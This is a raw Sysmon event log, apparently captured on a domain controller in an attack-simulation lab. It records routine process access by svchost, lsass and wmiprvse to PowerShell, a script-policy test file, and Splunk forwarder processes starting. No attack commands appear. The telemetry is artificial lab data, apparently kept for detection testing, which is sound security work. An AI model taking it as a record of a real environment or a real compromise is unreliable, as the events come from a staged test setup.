16:10:35.409{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031005Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.144{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-55FA-6008-FE06-00000000A301}4544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031004Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.144{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-55FA-6008-FE06-00000000A301}4544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031003Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.097{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-55FA-6008-FE06-00000000A301}4544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031002Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.097{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-55FA-6008-FE06-00000000A301}4544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000031001Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.034{7901BC46-55FA-6008-FE06-00000000A301}4544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1u4cpuwj.igo.ps12021-01-20 16:10:35.034 10341000x800000000000000031000Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.019{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-55FA-6008-FE06-00000000A301}4544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031118Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:55.174{7901BC46-4987-6008-0D00-00000000A301}9961420C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031135Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:07.940{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-561B-6008-0107-00000000A301}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031134Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:07.940{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031133Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:07.940{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031132Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:07.940{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031131Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:07.940{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031130Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:07.940{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-561B-6008-0107-00000000A301}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031129Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:07.940{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-561B-6008-0107-00000000A301}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031128Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:07.940{7901BC46-561B-6008-0107-00000000A301}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031127Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:07.439{7901BC46-561B-6008-0007-00000000A301}56605112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031126Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:07.299{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-561B-6008-0007-00000000A301}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031125Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:07.299{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031124Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:07.299{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031123Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:07.299{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031122Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:07.299{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031121Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:07.299{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-561B-6008-0007-00000000A301}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031120Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:07.299{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-561B-6008-0007-00000000A301}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031119Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:07.300{7901BC46-561B-6008-0007-00000000A301}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031143Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:08.455{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-561C-6008-0207-00000000A301}7264C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031142Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:08.455{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031141Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:08.455{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031140Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:08.455{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031139Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 